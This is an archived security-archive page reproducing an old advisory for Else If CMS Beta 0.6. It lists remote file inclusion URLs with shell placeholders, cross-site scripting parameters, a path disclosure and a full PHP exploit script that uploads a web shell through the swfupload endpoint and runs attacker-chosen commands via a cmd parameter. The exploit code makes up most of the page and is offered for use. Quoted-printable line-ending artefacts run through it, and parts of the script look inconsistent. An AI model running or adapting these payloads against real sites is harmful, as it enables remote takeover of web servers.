Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb12853.htm

Else If cms Multiple Remote vulnerabilities



Else If cms Multiple Remote vulnerabilities
Else If cms Multiple Remote vulnerabilities



Hello,,=0D
=0D
=0D
ELSEIF CMS=0D
Tested on "Else If version Beta 0.6"=0D
=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
=0D
These Are Examples ..=0D
=0D
iam tiered fetching the injected files :)=0D
=0D
Remote File inclusion=0D
elseif/contenus.php?contenus=[Shell]=0D
elseif/utilisateurs/votes.php?tpelseifportalrepertoire=[Shell]=0D
elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=[Shell]=0D
elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=[Shell]=0D
elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=[Shell]=0D
elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=[Shell]=0D
elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=[Shell]=0D
elseif/moduleajouter/articles/usrarticles.php?corpsdesign=[Sh3ll]=0D
elseif/moduleajouter/depot/usrdepot.php?corpsdesign[Sh3ll]=0D
elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=[Shell]=0D
=0D
Remote File Upload Ability=0D
elseif/externe/swfupload/upload.php=0D
=0D
Xss=0D
example=0D
elseif/utilisateurs/vousetesbannis.php?repertimage="><"=0D
elseif/utilisateurs/votesresultats.php?elseifvotetxtresultatduvote==0D
elseif/moduleajouter/depot/adminforum.php?elseifforumtxtmenugeneraleduforum==0D
=0D
Full Path=0D
elseif/utilisateurs/votesresultats.php=0D
=0D
Upload Exploits:=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
echo('=0D
/**********************************************/=0D
/*       ELSEIF CMS Shell Upload Exploit         */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<4) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host path cmd=0D
/* Example:                                   */=0D
/*    php '.$argv[0].' localhost /freewps/ id=0D
/**********************************************/=0D
');=0D
die;=0D
}=0D
=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
=0D
function connect($packet)=0D
{=0D
  global $host, $port, $html;=0D
    $con=fsockopen(gethostbyname($host),$port);=0D
    if (!$con)=0D
    {=0D
      echo '[-] Error - No response from '.$host.':'.$port; die;=0D
    }=0D
  fputs($con,$packet);=0D
    $html='';=0D
    while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D
      $html.=fread($con,1);=0D
    }=0D
      GLOBAL $html;=0D
  fclose($con);=0D
}=0D
=0D
$i=0;=0D
$data="";=0D
=0D
function add_data($name,$value,$type="no",$filename)=0D
{=0D
         GLOBAL $data,$i;=0D
if($type=="file")=0D
{=0D
$data.="-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";=0D
Content-Type: text/plain=0D
=0D
$value=0D
";=0D
}=0D
elseif($type=="init")=0D
{=0D
=0D
$data.="-----------------------------7d62702f250530--";=0D
=0D
}=0D
elseif($type=="clean")=0D
{=0D
$data="";=0D
}=0D
else=0D
{=0D
$data.="-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name=\"$name\";=0D
Content-Type: text/plain=0D
=0D
$value=0D
";=0D
}=0D
=0D
=0D
}=0D
=0D
$host=$argv[1];=0D
$path=$argv[2];=0D
$cmd=$argv[3];=0D
$port=80;=0D
=0D
$cmd=urlencode($cmd);=0D
=0D
$p='http://'.$host.':'.$port.$path;=0D 
=0D
Echo "\n[+] Trying to Upload File";=0D
=0D
$cookie="Master=HACKERS20%PAL";=0D
$contents='';=0D
=0D
add_data("soqor.php",$contents,"file","Filedata");=0D
add_data('','',"init");=0D
=0D
$packet="POST ".$p."elseif/externe/swfupload/upload.php?&-269001946=1&-834358190=1 HTTP/1.0\r\n";=0D
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";=0D
$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";=0D 
$packet.="Accept-Language: it\r\n";=0D
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";=0D
$packet.="Accept-Encoding: gzip, deflate\r\n";=0D
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Connection: Close\r\n";=0D
$packet.="Cache-Control: no-cache\r\n";=0D
$packet.="Cookie: ".$cookie."\r\n\r\n";=0D
$packet.=$data;=0D
connect($packet);=0D
$dir=$p."elseif/image/logodusite/soqor.php";=0D
=0D
       $httml = get_page($dir);=0D
=0D
if (eregi("Cannot execute a blank command",$httml))=0D
{=0D
echo "\n[+] Successfully uploaded ...\n[+] Go To http://".$p."?cmd=$cmd\n[+] For your own commands.. \n[+] The Result Of The Command\n";=0D 
      Echo get_page($p."upload/soqor.php?cmd=".$cmd);=0D
}=0D
else=0D
{=0D
   echo "\n[-] Unable to Upload File\n[-] Exploit Failed";=0D
}=0D
echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
?>=0D
=0D
# WwW.SoQoR.NeT 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH